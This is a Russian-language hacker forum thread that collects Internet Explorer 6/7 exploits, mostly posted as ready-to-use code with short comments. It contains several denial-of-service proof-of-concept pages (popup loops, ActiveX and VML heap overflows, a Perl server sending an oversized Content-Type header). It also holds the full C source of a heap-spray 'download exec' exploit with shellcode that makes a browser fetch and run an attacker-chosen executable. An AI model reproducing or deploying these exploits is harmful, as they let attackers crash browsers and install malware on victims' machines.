Microsoft Internet Explorer

[Ŧ1LAN]

И снова ослик!
ECMAScript interpreter stack overflow
тестировалось на IE 6.0.2900.2180 + windows sp2

InternerExplorer закрывается и выводит сообщение об ошибке "unknown software exception "

<html> 

<input type="button" name="btn" onclick="document.all['btn'].onclick(0);document.write('');"> 

</html>

 

[Ŧ1LAN]

MS Internet Explorer Dos Exploit
Проверено на шестом ослике СП2

<--

by WeKSTiK from AnOnYmOuS GrOuP
www.anonymous.ru
Hi xPow! =)

-->

<html>
<body>
<script language = javascript>
function generate_windows()
{
var i=0;
while (i < 1)
{
window. open("http://www.anonymous.ru"); 
}
} 
</script>
<body onload = "generate_windows()">
</body>
</html>

Источник: ivdb.org

 

[not null]

ИМХО слишком громко названо, Dos Exploit. Никакой уязвимости здесь нет,
просто обычное зацикливание, не более. Такой "эксплоит" может написать любой школьник, хоть немного разбирающийся в программировании. И работает не только на осле, но и на всех браузерах.
С таким же успехом, строку

var i=0;
while (i < 1)

можно было записать проще:

while (1==1)

 

[007NOT@]

>MS Internet Explorer Dos Exploit
га га га, онож тысчу лет висит на античате, обычный попапер =)
[mod][Ŧ1LAN:] а некоторые до сих пор считают что это гениально, особенно наши забугорные друзья %)[/mod]

 

[not null]

Программа: MSIE
Уязвимые версии: 6.x 5.1.0
Тип: remote
Опасность: критическая
Эксплоит: нет
Многичесленные ошибки при обработке HTML-кода, ActiveX-компонентов, COM-объектов позволяют злонамеренному пользователю с помощью специальной страницы выполнить произвольный код на целевой системе.
Также злонамеренный пользователь может подменить содержимое (или его часть) адресной строки и провести фишинг-атаку.
Решение - установить обновление производителя.

 

[007NOT@]

а чего нить есть свежее и мало жрущее память (ie_create_text_range) и не кидающее ни каких попапов (ms05-054) ?

 

[ZXroot]

Я в последнее время, когда сижу под Windows, использую Opera, Firefox -jscript, java, images. К IE мало доверия.

 

[Ŧ1LAN]

Ваш буфер обмена доступен всем!
Описание:
возможность получения текста, находящегося в буфере обмена пользователя браузера Microsoft Internet Explorer в момент захода на веб-сайт. Этот случай лишний раз акцентрирует внимание на не безопасных настройках "по-умолчанию", которые применяет компания Microsoft в своих продуктах.
Решение:
отключите функцию "Allow Paste Operations via Script"("Разрешить операции вставки через сценарий"), которая находится во вкладке "Security/Безопасность->Custom Level Security/Другой..." окна настроек Internet Explorer.
Пример/Эксплоит:
http://www.jerryandmissy.com/work/clipboard.htm

 

[Ŧ1LAN]

как говорится Internet Explorer он и в Африке Internet Explorer.
MS Inteternet Explorer 7 (applet) Remote Denial of Service Exploit
Уязвимый продукт: Internet Explorer 7.0 Beta
Пример/Эксплоит:

<html>
    <body>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
        <applet>
    </body>
</html>

 

[Nixoid]

ОСЛОМ непользуюсь уже год слишним не вызывает он у меня доверия.... :yinyang:
[mod][Ŧ1LAN:] он у многих вызывает недоверие. если не можешь ничего дельного сказать лучше промолчи. в след раз предупреждать не буду, -1 в рейтинг за набив постов.[/mod]

 

[not null]

Internet Explorer 6 heap overflow (Переполнение кучи) denial of servise exploit
tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system

<html><body><script>

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject("Internet.HHCtrl.1");
	var b = unescape("XXXX");
	while (b.length < 256) b += b;
	
	for (var i=0; i<4096; i++) {
        	a['Image'] = b + "";
	}
}

</script>

Clicking the button below may crash your browser!


<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>

PS
у меня не сработал. Выдает ошибку с ActiveX

 

[Ŧ1LAN]

Сплоит для ослика.
MS Internet Explorer 6 (Content-Type) Stack Overflow Crash

#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage: 
#   1) run this code
#       2) open http://127.0.0.1/ with IE
#      

use IO::Socket;
my $sock=new IO::Socket::INET (Listen    => 1,
                                 LocalAddr => 'localhost',
                                 LocalPort => 80,
                                 Proto     => 'tcp');
die unless $sock;
$huge="A" x 1100000;
$|=1;
print ">http server started on port 80... try 'iexplore http://127.0.0.1/' \n";
$z=$sock->accept();
print ">connection!\n";
do
{
	$ln=<$z>;
	print $ln;
	chomp $ln;
	
	if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
	{
  print ">sending response\n";
  print $z "HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
  close($z);
  exit;
	}
} while (true);

 

[Qu!]

Понятно.

 

[not null]

Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным и выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибки интерпретации HTML кода в определенной комбинации позиций. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

2. Уязвимость существует из-за ошибки при обработке таблицы каскадных стилей. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

3. Уязвимость существует из-за ошибки в механизме воспроизведения HTML кода. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

4. Уязвимость существует из-за ошибок при инициализации COM объектов, которые не должны быть инициализированы в браузере. Удаленный пользователь может с помощью специально сформированной страницы выполнить произвольный код на целевой системе.

5. Уязвимость существует в механизме определения источника выполняемого сценария. Удаленный пользователь может выполнить произвольный сценарий в браузере жертвы в контексте безопасности другого домена или другой зоны.

6. Удаленный пользователь может с помощью специально сформированного сценария получить доступ к содержимому Web страницы в другом домене или другой зоне.

 

[not null]

Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
Часть metasploit framework
Скачать|Download

 

[not null]

MS Internet Explorer Multiple COM Object Color Property DoS

<html>
<head>
<title></title>
</head>
</body>
<script>
var i =0;
var Objects = new Array(

// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",

// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",

// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",

// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",

// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",

// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",

null
);

var b = "AAAA";

while(b.length < 0x2000000)
{
   b += b;
}

while(Objects[i])
{
    var a = null;

    window.status = "Create Object " + Objects[i] + "...";

    try { a = new ActiveXObject(Objects[i]); } catch(e){}

    if(a)
    {
       window.status = "Try Set " + Objects[i] + ".Color ...";
       try { a.Color = b;} catch(e){}
    }

   i++;
}

window.status = "failed!";

</script>
</body>
</html>

IE6 на WinXP со всеми заплатками завалил. Опера и Огнелис нечувствительны.

 

[not null]

DoS в 6-ом ослике

<!--// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html>

<head>

<title>test</title>

</head>

<body>

<script>

var target = new ActiveXObject("DirectAnimation.PathControl");

target.Spline(0xffffffff, 1);

</script>

</body>

</html>

 

[not null]

Переполнение буфера в ослике IE с выполнением шеллкода.
Паблик нульдэй:

/*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!!  Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org
*          :
* Tested   : Windows 2000 Server SP4 CN
*          :     + Internet Explorer 6.0 SP1
*          : Windows XP SP2 CN
*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
*          :
* Complie  : cl daxctle2.c
*          :
* Usage       :d:\>daxctle2
*          :
*          :Usage: daxctle <URL> [htmlfile]
*          :
*          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
*          :
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =     
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04"
"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33"
"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08"
"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b"
"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10"
"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7"
"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b"
"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e"
"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f"
"\x70";    

char * header =
"<html>\n"
"<head>\n"
"<title>XSec.org</title>\n"
"</head>\n"
"<body>\n"
"<script>\n"
"shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u4343\" + \n";

// Change this script by yourself.
char * footer =
"bigbk = unescape(\"%u0D0D%u0D0D\");\n"
"headersize = 20;\n"
"slackspace = headersize + shellcode.length\n"
"while (bigbk.length < slackspace) bigbk += bigbk;\n"
"fillbk = bigbk.substring(0, slackspace);\n"
"bk = bigbk.substring(0, bigbk.length-slackspace);\n"
// bk = nop+nop;-)
"while(bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;\n"  
"memory = new Array();\n"
"for (i=0;i<800;i++) memory[i] = bk + shellcode;\n"
"var target = new ActiveXObject(\"DirectAnimation.PathControl\");\n"
"target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));\n"
"</script>\n"
"</body>\n"
"</html>\n";

// print unicode shellcode
void PrintUc(char *lpBuff, int buffsize)
{
   int i,j;
   char *p;
   char msg[4];

   for(i=0;i<buffsize;i+=2)
       {
       if((i%16)==0)
       {
           if(i!=0)
           {
               printf("\"\n\"");
               fprintf(fp, "%s", "\" +\n\"");
           }
           else
           {
               printf("\"");
               fprintf(fp, "%s", "\"");
           }
       }
           
       printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
       
       fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
     }
     

       printf("\";\n");
       fprintf(fp, "%s", "\");\n");          
   
   
   fflush(fp);
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};

   int sc_len = 0;


        if (argc < 2)
   {
         printf("Internet Explorer COM Object Remote Heap Overflow Download Exec Exploit\n");
         printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
         //printf("!!! 0Day !!! Please Keep Private!!!\n");
       printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
       exit(1);
   }
   
   url = argv[1];
   
   //if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
        {
            //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n");
            printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
            return;                
        }

      printf("[+] download url:%s\n", url);
      
      if(argc >=3) file = argv[2];
      printf("[+] exploit file:%s\n", file);
       
   fp = fopen(file, "w");
   if(!fp)
   {
       printf("[-] Open file error!\n");
          return;
   }    
   
   // print html header
   fprintf(fp, "%s", header);
   fflush(fp);
   
   // print shellcode
   memset(buf, 0, sizeof(buf));
   sc_len = sizeof(sc)-1;
   memcpy(buf, sc, sc_len);
   memcpy(buf+sc_len, url, strlen(url));
   
   sc_len += strlen(url)+1;
   PrintUc(buf, sc_len);
 
   // print html footer
   fprintf(fp, "%s", footer);
   fflush(fp);  
   
   printf("[+] exploit write to %s success!\n", file);
}

В тему

 

[not null]

Критическая уязвимость в браузере Internet Explorer 6 со всеми патчами позволяет злонамеренному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой машине
Пример DoS (РоС)

<!--
Currently just a DoS

EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX

Shirkdog
-->

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body>


<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>

</body>
</html>

Проверить "на себе" можно здесь
Примечание: в тексте сплоита строчка method = "AA...ABCD01" должна быть записана в одну строку.
Существует троян, по классификации Symantec Trojan.Vimalov, эксплуатирующий данную уязвимость.
Подробнее
Опере пофигу. ФФ тоже.
В тему

 

[not null]

MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)
Сурс сплоита
Internet Explorer VML Buffer Overflow Download Exec 0'day Exploit public version
Сурс сплоита